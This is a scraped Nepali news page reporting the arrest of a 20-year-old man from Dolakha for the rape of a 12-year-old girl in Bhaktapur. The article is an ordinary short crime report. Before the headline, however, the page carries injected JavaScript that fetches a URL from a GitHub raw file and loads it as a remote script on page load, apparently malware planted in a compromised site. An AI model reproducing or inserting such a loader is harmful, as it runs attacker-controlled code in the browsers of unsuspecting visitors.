;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); १२ वर्षीय बालिकालाई जबरजस्ती करणी गर्ने दोलखाका केसी पक्राउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • १२ वर्षीय बालिकालाई जबरजस्ती करणी गर्ने दोलखाका केसी पक्राउ
दुर्घटना/अपराध

१२ वर्षीय बालिकालाई जबरजस्ती करणी गर्ने दोलखाका केसी पक्राउ

मंसिर १४,

भक्तपुर । १२ वर्षीय बालिकालाई जबरजस्ती करणी गरेको अभियोगमा  दोलखाका एक जना पक्राउ परेका छन् । पक्राउ पर्नेमा दोलखा जिल्ला भिमेश्वर नगरपालिका-७ माने घर भई भक्तपुर दुवाकोट बस्दै आएका २० वर्षीय श्याम कृष्ण केसी रहेका छन् ।

उनले बालिकालाई गत साउन १८ गते जबरजस्ती करणी गरेको प्रहरीले जनाएको छ । उनलाई पक्राउ गरी थप अनुसन्धान भैरहेको प्रहरीको केन्द्रीय समाचार कक्षले जनाएको छ ।

फेसबुक प्रतिक्रियाहरु